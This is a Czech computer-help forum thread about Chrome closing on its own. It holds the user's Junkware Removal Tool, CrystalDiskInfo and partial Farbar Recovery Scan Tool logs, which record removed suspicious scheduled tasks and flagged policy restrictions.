Chrome se samovolně vypíná

[autoprd]

Zdravím, v posledních 2 týdnech se mi stále samovolně vypíná Chrome.
Jediné co v událostech najdu ve stejný čas co se vypne chrome je PowerShell 12 záznamů za 20 vteřin. Screenshoty v příloze.

PC byl zkontrolován MBAM, AdwCleaner, RogueKiller - bez nálezu.
Chrome byl odinstalován, vyčištěn pomocí Cleanup tool, smazána složka User z AppData/chrome
Deaktivovány všechny rozšíření.
Deaktivovány úlohy v Plánování úloh.
Absolutně bez změny.


Mockrát děkuji.

[Reklama]

[jaro3]

Logy vkládej normálně do příspěvku. špatně se to luští. Počkám.

+
Stáhni si Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
https://downloads.malwarebytes.com/file/JRT-EOL
na svojí plochu.

Deaktivuj si svůj antivirový program. Pravým tl. myši klikni na JRT.exe a vyber „spustit jako správce“. Pro pokračování budeš vyzván ke stisknutí jakékoliv klávesy. Na nějakou klikni.
Začne skenování programu. Skenování může trvat dlouho , podle množství nákaz. Po ukončení skenu se objeví log (JRT.txt) , který se uloží na ploše.
Zkopíruj sem prosím celý jeho obsah.


Stáhni si CrystalDiskInfo
https://www.stahuj.cz/utility_a_ostatni ... ldiskinfo/
Spusť program a klikni na Úpravy-Kopírovat. Poté sem vlož pomocí Ctrl+V obsah logu.

[autoprd]

Dobře, mockrát děkuji
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by Woytman (Administrator) on 07.11.2022 at 23:27:09,87
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 6

Successfully deleted: C:\ProgramData\productdata (Folder)
Successfully deleted: C:\Users\Public\thunder network (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\update-sys (Task)
Successfully deleted: C:\WINDOWS\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001.job (Task)
Successfully deleted: C:\WINDOWS\Tasks\update-sys.job (Task)



Registry: 2

Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 07.11.2022 at 23:28:37,61
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[autoprd]

----------------------------------------------------------------------------
CrystalDiskInfo 8.17.11 (C) 2008-2022 hiyohiyo
Crystal Dew World: https://crystalmark.info/
----------------------------------------------------------------------------

OS : Windows 11 [10.0 Build 22000] (x64)
Date : 2022/11/07 23:27:00

-- Controller Map ----------------------------------------------------------
+ Intel(R) 300 Series Chipset Family SATA AHCI Controller [ATA]
- ADATA SU800
+ Řadič Standard NVM Express [SCSI]
- WDC PC SN520 SDAPNUW-512G-1032
- Řadič prostorů úložišť [SCSI]

-- Disk List ---------------------------------------------------------------
(01) WDC PC SN520 SDAPNUW-512G-1032 : 512,1 GB [0/0/0, sq] - nv
(02) ADATA SU800 : 512,1 GB [1/1/4, pd1] - sm

----------------------------------------------------------------------------
(01) WDC PC SN520 SDAPNUW-512G-1032
----------------------------------------------------------------------------
Model : WDC PC SN520 SDAPNUW-512G-1032
Firmware : 20140000
Serial Number : 191506801158
Disk Size : 512,1 GB
Interface : NVM Express
Standard : NVM Express 1.3
Transfer Mode : PCIe 3.0 x2 | PCIe 3.0 x2
Power On Hours : 6502 hours
Power On Count : 3939 count
Host Reads : 45343 GB
Host Writes : 36521 GB
Temperature : 43 C (109 F)
Health Status : Good (96 %)
Features : S.M.A.R.T., TRIM, VolatileWriteCache
Drive Letter : C: Z:

-- S.M.A.R.T. --------------------------------------------------------------
ID RawValues(6) Attribute Name
01 000000000000 Critical Warning
02 00000000013C Composite Temperature
03 000000000064 Available Spare
04 00000000000A Available Spare Threshold
05 000000000004 Percentage Used
06 000005AAFC0E Data Units Read
07 00000490B28B Data Units Written
08 0000276A484A Host Read Commands
09 000024887385 Host Write Commands
0A 0000000008F8 Controller Busy Time
0B 000000000F63 Power Cycles
0C 000000001966 Power On Hours
0D 00000000004D Unsafe Shutdowns
0E 000000000000 Media and Data Integrity Errors
0F 000000000000 Number of Error Information Log Entries

-- IDENTIFY_DEVICE ---------------------------------------------------------
0 1 2 3 4 5 6 7 8 9
000: 15B7 15B7 3931 3531 3630 3038 3131 3835 2020 2020
010: 2020 2020 4457 2043 4350 5320 354E 3032 5320 4144
020: 4E50 5755 352D 3231 2D47 3031 3233 2020 2020 2020
030: 2020 2020 3032 3431 3030 3030 4404 001B 0700 0001
040: 0300 0001 A120 0007 4240 000F 0200 0000 0002 0000
050: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
060: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
070: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
080: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
090: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
100: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
110: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
120: 0000 0000 0000 0000 0000 0000 0000 0000 0017 0704
130: 0214 04FF 0101 0163 0167 0032 0000 0000 0000 0000
140: 6000 3C25 0077 0000 0000 0000 0000 0000 0000 0000
150: 0000 0000 0000 0000 0000 0000 0000 0000 003D 0101
160: 0000 0001 0111 0167 0000 0000 0000 0000 0000 0000
170: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
180: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
190: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
200: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
210: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
220: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
230: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
240: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
250: 0000 0000 0000 0000 0000 0000

-- SMART_NVME --------------------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 00 3C 01 64 0A 04 00 00 00 00 00 00 00 00 00 00
010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
020: 0F FC AA 05 00 00 00 00 00 00 00 00 00 00 00 00
030: 90 B2 90 04 00 00 00 00 00 00 00 00 00 00 00 00
040: 55 48 6A 27 00 00 00 00 00 00 00 00 00 00 00 00
050: BD 73 88 24 00 00 00 00 00 00 00 00 00 00 00 00
060: F8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00
070: 63 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 00
080: 66 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00
090: 4D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

----------------------------------------------------------------------------
(02) ADATA SU800
----------------------------------------------------------------------------
Model : ADATA SU800
Firmware : R0427ANR
Serial Number : 2J0720126252
Disk Size : 512,1 GB (8,4/137,4/512,1/----)
Buffer Size : Unknown
Queue Depth : 32
# of Sectors : 1000215216
Rotation Rate : ---- (SSD)
Interface : Serial ATA
Major Version : ACS-3
Minor Version : ACS-3 Revision 5
Transfer Mode : SATA/600 | SATA/600
Power On Hours : 6471 hours
Power On Count : 2746 count
Host Reads : 12579 GB
Host Writes : 13819 GB
NAND Writes : 72720 GB
Temperature : 27 C (80 F)
Health Status : Good (91 %)
Features : S.M.A.R.T., APM, NCQ, TRIM, DevSleep, GPL
APM Level : 00FEh [ON]
AAM Level : ----
Drive Letter : D: E:

-- S.M.A.R.T. --------------------------------------------------------------
ID Cur Wor Thr RawValues(6) Attribute Name
01 100 100 __0 000000000000 Read Error Rate
05 100 100 __0 000000000000 Reallocated Sectors Count
09 100 100 __0 000000001947 Power-On Hours
0C 100 100 __0 000000000ABA Power Cycle Count
94 100 100 __0 000000003309 SLC Total Erase Count
95 100 100 __0 000000000380 SLC Maximum Erase Count
96 100 100 __0 000000000313 SLC Minimum Erase Count
97 100 100 __0 000000000367 SLC Average Erase Count
9F 100 100 __0 000000000000 DRAM 1 bit Error Count
A0 100 100 __0 000000000000 Uncorrectable sectors count when read/write
A1 100 100 __0 00000000002C Number of Valid Spare Blocks
A3 100 100 __0 00000000000E Number of Initial Invalid Blocks
A4 100 100 __0 00000000FC80 Total Erase Count
A5 100 100 __0 0000000000A3 Maximum Erase Count
A6 100 100 __0 000000000040 Minimum Erase Count
A7 100 100 __0 000000000089 Average Erase Count
A8 100 100 __0 0000000005DC Max Erase Count of Spec
A9 100 100 __0 00000000005B Remain Life
B1 100 100 _50 00000000000A Total Wear Level Count
B5 100 100 __0 000000000000 Total Program Fail Count
B6 100 100 __0 000000000000 Total Erase Fail Count
C0 100 100 __0 0000000000A4 Power-Off Retract Count
C2 100 100 __0 00000000001B Temperature
C3 100 100 __0 000000000000 Hardware ECC Recovered
C4 100 100 _16 000000000000 Reallocation Event Count
C7 100 100 _50 000000000000 Ultra DMA CRC Error Count
E8 100 100 __0 000000000064 Available Reserved Space
F1 100 100 __0 00000006BF78 Total LBA Written
F2 100 100 __0 000000062477 Total LBA Read
F5 100 100 __0 000000238200 Flash Write Sector Count

-- IDENTIFY_DEVICE ---------------------------------------------------------
0 1 2 3 4 5 6 7 8 9
000: 0040 3FFF C837 0010 0000 0000 003F 0000 0000 0000
010: 324A 3037 3230 3132 3632 3532 2020 2020 2020 2020
020: 0000 0000 0000 5230 3432 3741 4E52 4144 4154 4120
030: 5355 3830 3020 2020 2020 2020 2020 2020 2020 2020
040: 2020 2020 2020 2020 2020 2020 2020 8010 4000 2F00
050: 4001 0000 0000 0006 3FFF 0010 003F FC10 00FB 9D10
060: FFFF 0FFF 0000 0007 0003 0078 0078 0078 0078 4D28
070: 0000 0000 0000 0000 0000 001F 850E 0006 014C 004C
080: 07F0 006D 706B 7409 4163 7069 B409 4163 407F 0001
090: 0001 00FE FFFE 0000 0000 0000 0000 0000 0000 0000
100: 12B0 3B9E 0000 0000 0000 0008 4000 0000 5707 C181
110: 0076 21E8 0000 0000 0000 0000 0000 0000 0000 411C
120: 401C 0000 0000 0000 0000 0000 0000 0000 0021 4144
130: 4154 4100 0000 0000 0000 0000 0000 0000 0000 0000
140: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
150: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
160: 0000 0000 0000 0000 0000 0000 0000 0000 0003 0001
170: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
180: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
190: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
200: 0000 0000 0000 0000 0000 0000 0035 0000 0000 4000
210: 0000 0000 0000 0000 0000 0000 0000 0001 0000 0000
220: 0000 0000 11FF 0000 0000 0000 0000 0000 0000 0000
230: 12B0 3B9E 0000 0000 0001 0200 0000 0000 0000 0000
240: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
250: 0000 0000 0000 0000 0000 C5A5

-- SMART_READ_DATA ---------------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 10 00 01 00 00 64 64 00 00 00 00 00 00 00 05 00
010: 00 64 64 00 00 00 00 00 00 00 09 00 00 64 64 47
020: 19 00 00 00 00 00 0C 00 00 64 64 BA 0A 00 00 00
030: 00 00 94 00 00 64 64 09 33 00 00 00 00 00 95 00
040: 00 64 64 80 03 00 00 00 00 00 96 00 00 64 64 13
050: 03 00 00 00 00 00 97 00 00 64 64 67 03 00 00 00
060: 00 00 9F 00 00 64 64 00 00 00 00 00 00 00 A0 00
070: 00 64 64 00 00 00 00 00 00 00 A1 00 00 64 64 2C
080: 00 00 00 00 00 00 A3 00 00 64 64 0E 00 00 00 00
090: 00 00 A4 00 00 64 64 80 FC 00 00 00 00 00 A5 00
0A0: 00 64 64 A3 00 00 00 00 00 00 A6 00 00 64 64 40
0B0: 00 00 00 00 00 00 A7 00 00 64 64 89 00 00 00 00
0C0: 00 00 A8 00 00 64 64 DC 05 00 00 00 00 00 A9 00
0D0: 00 64 64 5B 00 00 00 00 00 00 B1 00 00 64 64 0A
0E0: 00 00 00 00 00 00 B5 00 00 64 64 00 00 00 00 00
0F0: 00 00 B6 00 00 64 64 00 00 00 00 00 00 00 C0 00
100: 00 64 64 A4 00 00 00 00 00 00 C2 00 00 64 64 1B
110: 00 00 00 00 00 00 C3 00 00 64 64 00 00 00 00 00
120: 00 00 C4 00 00 64 64 00 00 00 00 00 00 00 C7 00
130: 00 64 64 00 00 00 00 00 00 00 E8 00 00 64 64 64
140: 00 00 00 00 00 00 F1 00 00 64 64 78 BF 06 00 00
150: 00 00 F2 00 00 64 64 77 24 06 00 00 00 00 F5 00
160: 00 64 64 00 82 23 00 00 00 00 80 00 00 00 00 7B
170: 02 00 01 00 02 1E 02 00 00 00 00 00 00 00 00 00
180: 00 00 52 30 34 32 37 41 4E 52 00 00 00 00 00 00
190: 53 4D 32 32 35 38 42 31 36 41 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0D

-- SMART_READ_THRESHOLD ----------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 05 00
010: 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00
020: 00 00 00 00 00 00 0C 00 00 00 00 00 00 00 00 00
030: 00 00 94 00 00 00 00 00 00 00 00 00 00 00 95 00
040: 00 00 00 00 00 00 00 00 00 00 96 00 00 00 00 00
050: 00 00 00 00 00 00 97 00 00 00 00 00 00 00 00 00
060: 00 00 9F 00 00 00 00 00 00 00 00 00 00 00 A0 00
070: 00 00 00 00 00 00 00 00 00 00 A1 00 00 00 00 00
080: 00 00 00 00 00 00 A3 00 00 00 00 00 00 00 00 00
090: 00 00 A4 00 00 00 00 00 00 00 00 00 00 00 A5 00
0A0: 00 00 00 00 00 00 00 00 00 00 A6 00 00 00 00 00
0B0: 00 00 00 00 00 00 A7 00 00 00 00 00 00 00 00 00
0C0: 00 00 A8 00 00 00 00 00 00 00 00 00 00 00 A9 00
0D0: 00 00 00 00 00 00 00 00 00 00 B1 32 00 00 00 00
0E0: 00 00 00 00 00 00 B5 00 00 00 00 00 00 00 00 00
0F0: 00 00 B6 00 00 00 00 00 00 00 00 00 00 00 C0 00
100: 00 00 00 00 00 00 00 00 00 00 C2 00 00 00 00 00
110: 00 00 00 00 00 00 C3 00 00 00 00 00 00 00 00 00
120: 00 00 C4 10 00 00 00 00 00 00 00 00 00 00 C7 32
130: 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 00 00
140: 00 00 00 00 00 00 F1 00 00 00 00 00 00 00 00 00
150: 00 00 F2 00 00 00 00 00 00 00 00 00 00 00 F5 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04

[autoprd]

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-11-2022
Ran by Woytman (administrator) on WOYTMAN-NTB (Micro-Star International Co., Ltd. GF75 Thin 9SC) (07-11-2022 22:44:19)
Running from C:\Users\Woytman\Desktop
Loaded Profiles: Woytman
Platform: Microsoft Windows 11 Home Version 21H2 22000.1098 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) C:\Program Files (x86)\Razer\Synapse3\AudioVisualizer\ChromaVisualizer.exe
(C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) C:\Program Files (x86)\Razer\Synapse3\UserProcess\Razer Synapse Service Process.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCopyAccelerator.exe
(DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxCUIService.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxEM.exe
(explorer.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <11>
(Kilonova LLC -> Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adguard Software Limited -> Adguard Software Ltd) C:\Program Files (x86)\Adguard\AdguardSvc.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_3de4831720bb2934\RstMwService.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe
(services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(services.exe ->) (Intel Corporation -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxCUIService.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\IntelCpHDCPSvc.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\IntelCpHeciSvc.exe
(services.exe ->) (Locktime Software s.r.o. -> Locktime Software) C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\NisSrv.exe
(services.exe ->) (Micro-Star International Co., Ltd.) [File not signed] C:\Windows\SysWOW64\MSIService.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Razer USA Ltd. -> THX) C:\Program Files (x86)\Razer\THXService\Drivers\x64\THXService.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_5fb296660a9719a9\RtkAudUService64.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_421.20070.765.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_5fb296660a9719a9\RtkAudUService64.exe [3498408 2022-07-14] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [THX22adHelper] => C:\Program Files (x86)\Razer\THXVAD\Drivers\x64\THXHelper22ad.exe [386008 2019-09-18] (Razer USA Ltd. -> )
HKLM\...\Run: [THX0520Helper] => C:\Program Files (x86)\Razer\APO0520Drv\Drivers\x64\THXHelper0520.exe [386008 2019-09-18] (Razer USA Ltd. -> )
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226728 2019-07-21] (Kilonova LLC -> )
HKLM-x32\...\Run: [Adguard] => C:\Program Files (x86)\Adguard\Adguard.exe [6315480 2022-03-05] (Adguard Software Limited -> Adguard Software Ltd)
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4234088 2022-10-19] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [MicrosoftEdgeAutoLaunch_211F9FEB1C1D0C6ED6DD47C70C7E0A4C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3891624 2022-11-03] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [38789456 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3538440 2022-10-06] (Razer USA Ltd. -> Razer Inc.)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32696784 2022-11-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [GogGalaxy] => C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe [13668840 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.ScreenSaver.scr
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
HKU\S-1-5-18\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3538440 2022-10-06] (Razer USA Ltd. -> Razer Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\107.0.5304.88\Installer\chrmstp.exe [2022-11-02] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Startup: C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeepL auto-start.lnk [2022-11-05]
ShortcutTarget: DeepL auto-start.lnk -> (No File)
BootExecute: autocheck autochk * Partizan
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

